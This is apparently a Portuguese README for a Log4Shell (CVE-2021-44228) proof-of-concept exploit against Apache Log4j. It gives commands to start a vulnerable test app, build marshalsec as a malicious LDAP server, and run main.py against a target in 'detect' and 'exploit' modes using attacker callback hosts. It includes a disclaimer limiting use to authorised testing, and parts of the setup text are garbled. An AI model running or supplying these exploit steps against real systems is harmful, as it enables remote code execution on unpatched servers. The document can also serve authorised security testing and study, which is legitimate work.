
Log4Shell CVE-2021-44228 PoC
(CVE-2021-44228)
Exploit de teste para a vulnerabilidade crítica Log4Shell no Apache Log4j ≤ 2.14.1, que permite execução remota de código através de injeções JNDI.
⚠️ Este PoC é apenas para fins educacionais e testes controlados em ambientes autorizados. Não o utilize contra sistemas sem permissão expressa.
marshalsec (para o servidor LDAP malicioso)python3 -m http.server)Execute a app vulnerável:
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
Acesse: http://localhost:8080
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
python3 main.py -u http://target.com -i burp.collab.net -m detect
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit